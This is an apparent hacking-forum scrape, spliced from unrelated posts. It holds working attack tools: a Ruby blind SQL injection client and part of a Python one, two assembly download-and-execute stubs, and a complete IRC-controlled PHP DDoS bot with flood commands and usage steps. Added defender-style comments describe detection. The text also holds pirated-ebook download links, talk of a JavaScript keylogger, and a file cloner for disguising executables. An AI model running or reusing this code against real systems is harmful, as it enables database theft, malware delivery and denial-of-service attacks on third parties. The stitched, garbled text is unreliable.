== "--info": Guess_URL = line_URL + str(let_pos)+",1))" else: Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))" value = chr(GuessValue(Guess_URL)) sys.stdout.write("%s" % (value)) file.write(value) sys.stdout.flush() let_pos+=1 print lim_num = int(lim_num) + 1 let_pos = 1 data_row+=1 #Lets wrap it up! 
if mode == "--schema" or mode == "--full" or mode == "--dump": print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) else: print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close()
-
# MySQL Blind Injection Tool
# Coder => SH4V
# n3t-datagrams.net
#
# Review note (defender view): this is a boolean-based blind SQL injection
# client. It reads a host, a request path, a column name and a table name
# from stdin, appends an `and ascii(substring((SELECT ...),pos,1))=<n>`
# condition to the path, and uses the response body length as the oracle.
# It repeats the same loop for character positions 1 through 22.
#
# What this looks like on the server side: long runs of GET requests to one
# path that differ only in the trailing integer, with
# `ascii(substring((SELECT` in the query string. Each loop has no upper bound
# on the guessed value, so a position that never changes the response length
# produces an open-ended stream of requests.
#
# Root-cause fix on the application side: bind the request parameter as a
# typed value (prepared statement) instead of concatenating it into SQL, and
# run the application with a database account that can read only what it
# needs. Request filtering on the SQL keywords above is a stopgap only.
require 'net/http'
puts "host:"
host=gets.chomp
puts "extension:"
ext=gets.chomp
puts "columna:"
col=gets.chomp
puts "tabla:"
tab= gets.chomp
num="0"
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
# Baseline response: same URL with "333" appended to the compared value.
corp2=http.get("#{url}333")
corp2=corp2.body
lon1=corp1.length
lon2=corp2.length
# --- character position 1 ---
# Increment the compared value until the body length differs from the baseline.
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
# Reset so that the next loop's condition holds on entry.
lon1=lon2
num="0"
# --- character position 2 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),2,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 3 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),3,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 4 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),4,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 5 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),5,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 6 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),6,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 7 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),7,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 8 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),8,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 9 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),9,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 10 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),10,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 11 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),11,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 12 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),12,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 13 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),13,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 14 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),14,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 15 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),15,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 16 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),16,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 17 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),17,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 18 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),18,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 19 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),19,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 20 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),20,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 21 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),21,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
res=String.new
res << "#{num}, "
lon1=lon2
num="0"
# --- character position 22 ---
while lon1 == lon2
  num=num.succ
  url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),22,1))=#{num}"
  http= Net::HTTP.new(host)
  corp1=http.get("#{url}")
  corp1=corp1.body
  lon1=corp1.length
end
-
; Review note (defender view): both listings below are download-and-execute
; stubs. Each one calls URLDownloadToFile (urlmon.dll) to write a remote URL
; to a local path and then hands that same path to ShellExecute (shell32.dll).
; The URLs and file names are the author's placeholders.
;
; Detection: a very small PE whose imports pair URLDownloadToFile with
; ShellExecute is a common static signature for this pattern; at run time,
; look for a process that makes one HTTP request, writes one file, and
; immediately launches it.
; Mitigation: application allow-listing, blocking launches from user-writable
; directories such as the temp path, and an egress proxy that does not let
; arbitrary workstation processes reach arbitrary hosts.
;
;Simple Downloader + Execute (1.50kb compiled)
;by iNs
;activespy.org
include 'win32ax.inc'
.code
inizio:
invoke URLDownloadToFile,NULL,"http://www.site.com/filetodownload.ext","C:\downloaded.txt",NULL,NULL ;download file
invoke ShellExecute,0,0,"C:\downloaded.txt",0,0,SW_SHOW ;run downloaded file
invoke ExitProcess,0
.end inizio
Download file in TempPath (2kb compiled) :
;Simple Downloader + Execute
;Save file in TempPath
; by iNs
; activespy.org
; Same pattern as the first listing; the only difference visible here is that
; the destination path is built from GetTempPath plus a fixed file name, so
; the written file lands in the user's temp directory.
include 'win32ax.inc'
.data
TmpName db 'new.txt',0
Tmpdir rb 256d ;256chrs
.code
inizio:
invoke GetTempPath,Tmpdir,Tmpdir ;get temppath
invoke lstrcat,Tmpdir,TmpName ;append
invoke lstrcpy,TmpName,Tmpdir ;copy
invoke URLDownloadToFile,NULL,"http://www.site.org/a.txt",TmpName,NULL,NULL ;download file in temppath
invoke ShellExecute,0,0,TmpName,0,0,SW_SHOW ;run downloaded file
invoke Sleep,3000 ;sleep 3 seconds
invoke ExitProcess,0 ;quit
.end inizio
-
Use: - Open mIRC (download: mirc.com) - Upload php_ddos_bot.php to your web server - Bot will join #yourchannel - PM the bot saying "ddos-udp IPHERE" - Enjoy.
<?php
/* PHP DDoS Bot Version 1.0 */
/*
 * Review note (defender view): this is an IRC-controlled bot meant to run
 * from a web server's PHP interpreter. It opens a TCP connection to a
 * hard-coded IRC server and port, joins a keyed channel, and then acts on
 * command words found in the lines it receives.
 *
 * Indicators on the hosting side:
 *   - a PHP process owned by the web server user holding a long-lived
 *     outbound TCP connection to port 6667;
 *   - a .php file in the web root that combines set_time_limit(0),
 *     fsockopen() and IRC verbs (nick / USER / join / privmsg / PONG);
 *   - IRC nick of the form "bot-" followed by six digits, USER name
 *     "cybercrime".
 * Indicators on the receiving side of the HTTP mode: repeated "GET /"
 * requests carrying exactly the header set built below
 * (Accept-Language: nl, MSIE 6.0 user agent).
 *
 * Mitigation on the hosting side: deny outbound connections from the web
 * tier except to known services, list fsockopen in php.ini
 * disable_functions where the application does not need it, keep upload
 * directories non-executable, and monitor the web root for new PHP files.
 */
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";
// Removes PHP's execution time limit, so the request that started this
// script never finishes on its own.
set_time_limit(0);
$loop = 0;
$verbonden = 0;
// Control connection to the IRC server.
$verbinden = fsockopen($server, $Port);
// Main loop: one iteration per line received from the IRC server.
while ($read = fgets($verbinden,512)) {
    $read = str_replace("\n","",$read);
    $read = str_replace("\r","",$read);
    // $read2 holds the space-separated tokens of the raw IRC line.
    $read2 = explode(" ",$read);
    // First line received: register with the server.
    if ($loop == 0) {
        fputs($verbinden,"nick $nick$nicknummer\n\n");
        fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
    }
    // Keep-alive: answer server PING.
    if ($read2[0] == "PING") {
        fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n");
    }
    // Numeric 251 from the server triggers the channel join.
    if ($read2[1] == 251) {
        fputs($verbinden,"join $Channel $Channelpass\n");
        $verbonden++;
    }
    // Channel-management commands; the argument is the fifth token of the line.
    if (eregi("bot-op",$read)) {
        fputs($verbinden,"mode $Channel +o $read2[4]\n");
    }
    if (eregi("bot-deop",$read)) {
        fputs($verbinden,"mode $Channel -o $read2[4]\n");
    }
    if (eregi("bot-quit",$read)) {
        fputs($verbinden,"quit :$msg\n\n");
        break;
    }
    if (eregi("bot-join",$read)) {
        fputs($verbinden,"join $read2[4]\n");
    }
    if (eregi("bot-part",$read)) {
        fputs($verbinden,"part $read2[4]\n");
    }
    // UDP mode: opens a udp:// stream to the fifth token on port 500 and
    // writes one buffer to it, reporting the outcome to the channel.
    if (eregi("ddos-udp",$read)) {
        fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
        $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
        if (!$fp) {
            //echo "$errstr ($errno)<br>\n"; // junk
            exit;
        } else {
            $char = "a";
            for($a = 0; $a < 9999999999999; $a++)
                $data = $data.$char;
            if(fputs ($fp, $data) )
                fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
            else
                fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
        }
    }
    // TCP mode: opens as many connections to token 5 : token 6 as token 7 says.
    if (eregi("ddos-tcp",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
        $server = $read2[4];
        $Port = $read2[5];
        for($sockets = 0; $sockets < $read2[6]; $sockets++) {
            $verbinden = fsockopen($server, $Port);
        }
    }
    // HTTP mode: sends the fixed request below token-7 times, one connection each.
    if (eregi("ddos-http",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
        $Webserver = $read2[4];
        $Port = $read2[5];
        // Fixed request text; this exact header set is usable as a request signature.
        $Aanvraag = "GET / HTTP/1.1\r\n";
        $Aanvraag .= "Accept: */*\r\n";
        $Aanvraag .= "Accept-Language: nl\r\n";
        $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
        $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
        $Aanvraag .= "Host: $read2[4]\r\n";
        $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
        for($Aantal = 0; $Aantal < $read2[6]; $Aantal++) {
            $DoS = fsockopen($Webserver, $Port);
            fwrite($DoS, $Aanvraag);
            fclose($DoS);
        }
    }
    $loop++;
}
?>
-
Ubuntu on a Dime: The Path to Low-Cost Computing Paperback: 280 pages Publisher: Apress; 1 edition (June 8, 2009) Language: English ISBN-10: 1430219726 ISBN-13: 978-1430219729 Format: PDF Description: You know that Ubuntu software costs nothing. Now you want the PC system that costs as little as possible and runs Ubuntu and OS applications without complaints and calls to tech support. So you spend your hard–earned dollars on the hardware only and have your own optimized Ubuntu PC. This is the book that will show you how to get what you need without wreaking havoc on your finances. Put together the parts to make a great work computer for little cost. Packed with the practical, hands–on guidance and technical know–how that you’ve come to expect from Apress, Ubuntu on a Dime takes you on a tour of the very best, but low–cost hardware, while only using zero–cost software in each of the many categories that matter to the typical PC user. You’ll learn how to find the best and cheapest hardware, and how to put it together to make a working PC. Learn to edit photos on the Internet without having to install any software at all. Find out where to get a free office suite for word processing and spreadsheet work. Whatever your need, James Kelly, best–selling technology author, guides you through the exciting and often confusing world of zero–cost computing. This book Takes you step–by–step through a PC build Tells you what you need to install to have a fantastic work computer without spending a dime Saves you money by showing you how to meet your computing needs Saves you time by pointing you directly to the best free software Saves you work by illustrating the most commonly performed tasks with each zero–cost software Gives you choices and the ability to make your own decisions for your own needs and requirements Before you go buy that $900 dollar computer and that $400 office suite—or worse, before you “borrow” it from work—stop! 
Let this inexpensive book show you how to save hundreds of dollars in expensive software, and never depend on the big PC providers and their tech support again. Learn all about cheap, but fast hardware, find out about the free tools that the digerati use to make their lives better, and stop paying out the nose. Don't spend a dime! What you’ll learn Source, buy, and put together the best hardware to make a cheap PC optimized for Ubuntu Linux. Find and install the best zero–cost software available. Learn about software as a service and take advantage of photo editing, calendaring, e-mail, and other functionality delivered at no cost via the Web. Harness the power of OpenOffice and Google Apps for your word processing, spreadsheet, presentation needs. Communicate with your friends through zero–cost voice calls, e-mail, and instant–messaging. Establish a presence on the Web through blogs and social networking sites such as Facebook. Download: http://www.file2box.com/htebxx7uuuiy Ubuntu Linux Secrets Paperback: 840 pages Publisher: Wiley (April 13, 2009) Language: English ISBN-10: 0470395087 ISBN-13: 978-0470395080 Format: PDF Description: The everyday Linux user can easily get overwhelmed by the complexity of the new software that exists when creating an Ubuntu system. This book covers the basics of creating a new system from scratch and explains what software is installed. You’ll take a tour of installing the Ubuntu Linux distribution system in most environments, including nontraditional situations such as dual-boot and text-based installations. Plus, clear explanations of each of the installed applications show you how to get the most out of each application, rather than simply using them as they exist. 
Download: http://www.file2box.com/e2rgzswf67ii Ubuntu Pocket Guide and Reference: A concise companion for day-to-day Ubuntu use Paperback: 166 pages Publisher: CreateSpace (January 19, 2009) Language: English ISBN-10: 1440478295 ISBN-13: 978-1440478291 Format: PDF Description: Ubuntu Pocket Guide and Reference is a compact yet comprehensive guide for everyday Ubuntu use, written by the award-winning and best-selling Ubuntu author Keir Thomas. First, you'll learn about installation--getting Ubuntu onto your computer--after which you'll learn how to configure your computer's hardware. Following this, you'll be introduced to the Ubuntu desktop, and the tricks and techniques of efficient day-to-day usage. The book then describes the highways of the Ubuntu filesystem, and gives a full run-down of the Ubuntu file manager. Next, the command-line is tackled in-depth, after which software management is explained. Finally, system security is described. Appendixes provide a glossary, and a guide to technical documentation. Written for anybody switching to Ubuntu, particularly Windows users, Ubuntu Pocket Guide and Reference assumes zero Linux knowledge and conveys expert knowledge. Download: http://uploading.com/files/EKSFHYNM/9781440478291-1440478295.rar.html Pro Ubuntu Server Administration Paperback: 424 pages Publisher: Apress; 1 edition (December 2, 2008) Language: English ISBN-10: 1430216220 ISBN-13: 978-1430216223 Format: PDF Description: Pro Ubuntu Server Administration teaches you advanced Ubuntu system building. After reading this book, you will be able to manage anything from simple file servers to multiple virtual servers to high–availability clusters. This is the capstone volume of the Apress Ubuntu trilogy that includes Beginning Ubuntu Linux, Third Edition and Beginning Ubuntu Server LTS Administration: From Novice to Professional, Second Edition. 
You will be able to make Ubuntu technology shine in a Fortune–500 environment and let Ubuntu server become the backbone of your infrastructure. Topics covered include Performance monitoring and optimization High–availability clustering Advanced LDAP integrated networking What you’ll learn Monitor Ubuntu Server software and the hardware it is running on. Make Ubuntu Server fly by careful optimization. Learn how to craft high–availability clusters. Ease your way into large–scale LDAP networking. Acquire the skills to adjust Ubuntu Server to the security needs of a Fortune–500 environment. Run your own Ubuntu application server. Download: http://uploading.com/files/9SAV2IQS/9781430216223-1430216220.rar.html Ubuntu Linux Toolbox: 1000+ Commands for Ubuntu and Debian Power Users Publisher: Wiley Language: English ISBN: 0470082933 Paperback: 332 pages Data: November 28, 2007 Format: PDF Description: Aimed squarely at aspiring Linux power users and professional administrators, the Ubuntu Linux Toolbox offers more than 1000 examples of useful Linux command lines. This compact, handy reference is made to carry with you, whether you are maintaining hundreds of Linux systems or just want to dig beneath the surface of your Ubuntu desktop system. This is the Linux reference book you need to step up to the next level. Download: http://www.paid4share.net/file/4056/0470082933-rar.html Linux Bible 2009 Edition: Boot up Ubuntu, Fedora, KNOPPIX, Debian, openSUSE, and more Paperback: 888 pages Publisher: Wiley; Pap/Dvdr/C edition (January 14, 2009) Language: English ISBN-10: 0470373679 ISBN-13: 978-0470373675 Format: PDF Description: As the ultimate resource on the basics of the Linux desktops, servers, and programming tools, this book is written by the ultimate author on all things Linux. 
This transition resource is ideal if you are making the move from Windows or Macintosh to using Linux as your desktop system, and explains the Linux technology, offers detailed installation instructions, and includes step-by-step descriptions of key desktop and server components. You’ll relish the in-depth descriptions that will help you choose the best Linux distribution to suit your needs. Download: http://www.file2box.com/u6bkgeldn72x Pro Linux System Administration Paperback: 1080 pages Publisher: Apress; 1 edition (June 22, 2009) Language: English ISBN-10: 1430219122 ISBN-13: 978-1430219125 Format: PDF Description: We can all be Linux experts, provided we invest the time in learning the craft of Linux administration. Pro Linux System Administration makes it easy for small to medium–sized businesses to enter the world of zero–cost software running on Linux and covers all the distros you might want to use, including Red Hat, Ubuntu, Debian, and CentOS. Authors, and systems infrastructure experts James Turnbull, Peter Lieverdink, and Dennis Matotek take a layered, component–based approach to open source business systems, while training system administrators as the builders of business infrastructure. If you want to implement a SOHO or SMB Linux infrastructure, Pro Linux System Administration clearly demonstrates everything you need. You’ll find this book also provides a solid framework to move forward and expand your business and associated IT capabilities, and you’ll benefit from the expertise and experienced guidance of the authors. Pro Linux System Administration covers An introduction to using Linux and free and open source software to cheaply and efficiently manage your business A layered model that allows your infrastructure to grow with your business Easy and simple–to–understand instructions including configurations, examples, and extensive real–world hints and tips Download: http://www.file2box.com/0i51y2fm5xur
-
Nu cred, incearca si tu mai multe chestii: Pune html-ul intr-un iframe si incearca sa scrii in pagina cu iframe sau altele... Nu am testat.
-
Logic. Keypress-urile trebuie sa le primeasca browserul, js-ul captureaza acestea si le trimite prin AJAX la PHP loggerul care le scrie in fisier.
-
Encryption algorithms: Blowfish: http://www.2shared.com/file/7104480/65a1678f/clsBlowfish.html DES: http://www.2shared.com/file/7104489/1c7ddf2b/clsDES.html GOST: http://www.2shared.com/file/7104491/bbd6658/clsGost.html RC4: http://www.2shared.com/file/7104496/95d9f3fb/clsRC4.html Rijndael: http://www.2shared.com/file/7104500/acba87b0/clsRijndael.html Serpent: http://www.2shared.com/file/7104509/d5663f14/clsSerpent.html Skipjack: http://www.2shared.com/file/7104514/b2cc72e8/clsSkipjack.html TEA: http://www.2shared.com/file/7104518/bb7a3ec3/clsTEA.html Twofish: http://www.2shared.com/file/7104521/e98bd5a4/clsTwofish.html + Huffman (compression algorithm): http://www.2shared.com/file/7104536/6ef47146/clsHuffman.html Hash algorithms: MD5: http://www.2shared.com/file/7104551/a6ca4363/clsMD5.html SHA: http://www.2shared.com/file/7104557/4fa9e656/clsSHA.html SHA256: http://www.2shared.com/file/7104554/d6a0b7ec/clsSHA256.html ALL: http://www.a1vbcode.com/download.asp?ID=1438 Note: DES, RC4, Skipjack and MD5 are no longer considered secure and are useful only for compatibility with legacy data; for new code prefer Rijndael (AES) and SHA256.
-
File Cloner v1.0 Copies the following attributes from one file to another: - Version Info - Icon - File Size (only takes effect when the source file is bigger than the destination file) - Date/time of last modification Only the attributes listed above are copied, so the destination file's contents and hash still differ from the source's. If you find any bugs, please report them to me! Tested on MS Windows XP and Windows 2003 Server. I am waiting for test results and comments. Sample pictures: - before clone: - after clone: Download: http://mo4x.ovh.org/file_cloner.zip Mirror: http://www.2shared.com/file/7104365/8e07a80b/file_cloner.html Regards, mo4x